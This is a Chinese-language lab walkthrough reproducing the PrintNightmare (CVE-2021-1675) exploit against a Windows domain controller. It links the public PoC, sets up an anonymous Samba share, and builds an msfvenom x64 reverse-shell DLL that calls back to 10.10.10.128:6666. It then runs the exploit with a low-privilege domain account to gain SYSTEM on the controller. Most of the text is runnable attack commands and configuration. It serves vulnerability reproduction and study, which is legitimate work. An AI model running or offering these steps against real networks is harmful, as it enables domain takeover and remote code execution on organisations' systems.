一、漏洞Poc

https://github.com/cube0x0/CVE-2021-1675

二、环境配置

1、添加一个普通的域用户

漏洞的使用就是当你在渗透时拥有了一个普通的域成员，可以利用此漏洞去攻击域控，执行命令，直接拿下域控

这里涉及到符号转义问题，只做复现密码随便来一个Passw0rd

2、检查Spooler是否开启(默认开启)

这个肯定是默认开启的，不开启这个功能就无法实现打印

Spooler打印功能，会加载dll文件，通过进程树查看，可以看到是system权限，因为spoolsv.exe是x64的，所以生成的dll也得是x64

三、复现

1、在运行漏洞利用之前，需要安装作者的 Impacket 包

pip3 uninstall impacket

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

这里就不演示了，复制粘贴命令即可

2、开启匿名访问smb

2.1、修改/etc/samba/smb.conf

这里使用原作者的不行(反正我不行)......就用自己了

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5

[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

2.2、实际测试下

可以访问smb目录即可，这里的smb就是/tmp

2.3、可能存在的问题

2.3.1、如果报错error什么0x5的，就是无法匿名访问

2.3.2、如果在windows里操作，访问smb，提示什么权限这样那样的，那你就要注意路径的权限问题

3、MSF生成木马，CS也一样，开启监听

3.1、在tmp目录下生成.dll木马

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.128 lport=6666 -f dll -o reverse.dll

3.2、开启监听

4、利用Poc

4.1、看下帮助文档

python3 CVE-2021-1675.py -h

4.2、构造POC利用

python3 CVE-2021-1675.py 普通域用户:域用户密码@DC的IP地址 '开启的匿名访问'

python3 CVE-2021-1675.py oa:Passw0rd@10.10.10.165 '\\10.10.10.128\smb\reverse.dll'

乱码可以使用下面命令解决

chcp 65001